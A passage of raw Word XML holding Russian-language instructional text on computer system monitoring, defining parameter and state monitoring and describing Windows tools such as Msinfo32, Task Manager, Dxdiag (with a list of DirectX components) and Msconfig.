        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг – процесс наблюдения и регистрации данных о каком-либо объекте на неразрывно примыкающих друг к другу интервалах времени, в течение которых значения данных существенно не изменяются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Различают Мониторинг параметров и Мониторинг состояния объекта.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг параметров – наблюдение за какими-либо параметрами. Результат мониторинга параметров представляет собой совокупность измеренных значений параметров, получаемых на неразрывно примыкающих друг к другу интервалах времени, в течение которых значения параметров существенно не изменяются.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг состояния – наблюдение за состоянием объекта для определения и предсказания момента перехода в предельное состояние.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Результат мониторинга состояния объекта представляет собой совокупность диагнозов составляющих его субъектов, получаемых на неразрывно примыкающих друг к другу интервалах времени, в течение которых состояние объекта существенно не изменяется.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принципиальным отличием мониторинга состояния от мониторинга параметров является наличие интерпретатора измеренных параметров в терминах состояния – экспертной системы поддержки принятия решений о состоянии объекта и дальнейшем управлении.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг в смысле I реализует программный модуль Msinfo32 (в папке C:\Program Files\Common Files\Microsoft Shared\MSInfo).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска программы открывается окно. В левой области окна </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> приведен список категорий, а в правой – подробные сведения о каждой из них. К этим категориям относятся:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Сведения о системе.</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Содержит общие сведения о компьютере и операционной системе, такие как имя компьютера и его изготовитель, тип используемой BIOS, а также объем установленной памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ресурсы аппаратуры</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Содержит дополнительные сведения об оборудовании компьютера, предназначенные для ИТ-специалистов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Компоненты</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Содержит перечень установленных дисководов, звуковых устройств, модемов и других компонентов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Программная среда</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Содержит сведения о драйверах, сетевых подключениях и другую информацию, связанную с программами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Пункты Ресурсы аппаратуры, Компоненты, Программная среда</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> раскрываются и показывают конкретные значения параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Чтобы найти определенные сведения о системе, введите ключевые слова в поле </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Что</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> найти внизу этого окна. Например, для поиска IP-адреса компьютера в поле Что найти введите IP-адрес и нажмите кнопку Найти.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Примечание</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Чтобы сохранить сведения о системе, последовательно выберите пункты Файл и Сохранить, введите имя файла, после чего нажмите кнопку Сохранить. ОС</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows сохраняет эту информацию в файловом формате NFO. При наличии проблем с открытием файла можно сохранить сведения о системе в формате TXT. Для этого последовательно выберите Файл, Экспорт, введите имя файла и нажмите кнопку Сохранить.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Мониторинг в смысле II реализует программный модуль Taskmgr.exe (в папке C:\Windows\System32) –</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Диспетчер задач отображает приложения, процессы и службы, которые в текущий момент запущены на компьютере. С его помощью можно контролировать производительность компьютера или завершать работу приложений, которые не отвечают.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска программы открывается окно </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Диспетчер задач Windows</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, содержащее вкладки: Приложения, Процессы, Быстродействие, Сеть, Пользователи.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Мониторинг состояния реализует программный модуль Dxdiag.exe (в папке C:\Windows\System32) – </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Средство диагностики DirectX</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Отображает сведения о компонентах и драйверах интерфейса прикладного программирования приложений (API) Microsoft DirectX в системе. Позволяет проверить работу звуковой и графической подсистем.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>DirectX (от англ. direct – прямой, непосредственный)– это набор API (интерфейс программирования приложений), разработанных для решения задач, связанных с программированием под Microsoft Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>В целом, DirectX подразделяется на:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectX Graphics, набор интерфейсов, ранее (до версии 8.0) делившихся на:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectDraw : интерфейс вывода растровой графики. (Его разработка давно прекращена)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Direct3D (D3D): интерфейс вывода тр</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>хмерных примитивов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectInput: интерфейс, используемый для обработки данных, поступающих с клавиатуры,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>мыши, джойстика и пр. игровых контроллеров.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectPlay: интерфейс сетевой коммуникации игр.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectSound: интерфейс низкоуровневой работы со звуком (формата Wave)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectMusic: интерфейс воспроизведения музыки в форматах Microsoft.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectShow: интерфейс, используемый для ввода/вывода аудио и/или видео данных.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">• DirectX Instruments– технология, позволяющая на основе мультимедийного API DirectX создавать и использовать программные синтезаторы. В о тличие о т D X-плагинов, такие программы могут полностью управляться по M IDI и служат главным образом не для обработки, а для синтеза звука. Технология DXi была популярна в 2001-2004 гг., особенно в программных продуктах Cakewalk, но со временем проиграла </w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>войну форматов</w:t>
      </w:r>
      <w:r w:rsidR="00E656E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> технологии VST от Steinberg.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectSetup: часть, ответственная за установку DirectX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• DirectX Media Objects: реализует функциональную поддержку потоковых объектов (например, кодировщики/декодировщики)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>• Direct2D: интерфейс вывода двухмерной графики</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При выполнении Dxdiag.exe открывается окно со следующими вкладками: Система, Файлы DirectX, Дисплей, Звук, Музыка, Ввод, Сеть, Если ничего не помогло. Все вкладки, кроме Система и Файлы DirectX, содержат средства диагностики.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Мониторинг состояния реализует программный модуль: Msconfig.exe (в папке C:\Windows\System32) – Настройка Системы. Для выполненияMsconfig.exe необходимо активировать папку WINDOWS\pchealth\helpctr\binaries. Открывается окно со следующими вкладками: Общие, SYSTEM.INI, WIN.INI, BOOT.INI, Службы, Автозагрузка. Вкладки содержат средства, позволяющие изменять конфигурацию ОС путем отключения (включения) системных компонентов и программных модулей, оптимизировать работу ОС, а также автоматизировать устранение неполадок при настройке ОС.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA04A8" w:rsidRPr="00617AC0" w:rsidRDefault="00EA04A8" w:rsidP="00EA04A8">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
